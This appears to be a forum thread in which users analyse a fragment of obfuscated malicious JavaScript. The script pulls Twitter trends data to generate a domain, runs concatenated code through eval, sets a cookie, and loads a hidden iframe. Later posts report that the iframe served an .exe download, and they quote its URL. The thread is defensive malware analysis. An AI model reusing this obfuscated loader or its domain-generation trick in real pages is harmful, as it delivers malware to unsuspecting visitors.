document.write("<scr" + "ipt language=javascript" + " src='http://search.twitter.com/trends/daily.json?date=" + shiftIndex + "&callback=callback2'>" + "</scr" + "ipt>");
}
function callback2(x) {
window.tw = x;
sc('rf5f6ds', 2, 7);
eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
document.write($a);
}
document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <scr" + "ipt language=javascript" + " src='http://search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");
} else {
$a = ''
};
function sc(cnm, v, ed) {
var exd = new Date();
exd.setDate(exd.getDate() + ed);
document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
};
It's then a case of going through and unescaping the strings assigned to variables (I've started this...but now it's time for bed!)
If it needs to run in order to do this, then so be it, I guess. Anyone know how to do this without compromising myself?
The simplest way is just to use Chrome in Linux.
I just ran it through Chrome in Linux in incognito mode. It looks harmless. The iframe's source isn't up.
Here's the screenshot of the WebKit Developer Tools with the page fully loaded (the script tag just contains the above script):
http://picasaweb.google.com/xsznix/MePwningSpam#5500978024402977090
EDIT: It seems that the iframe loads a .exe file. The url is different every time. http://niaijldnbvf.com/nte/PROX.exe
The file isn't up anymore, it gives me a 404 error. Google's anti-phishing thing blocks the URL for me.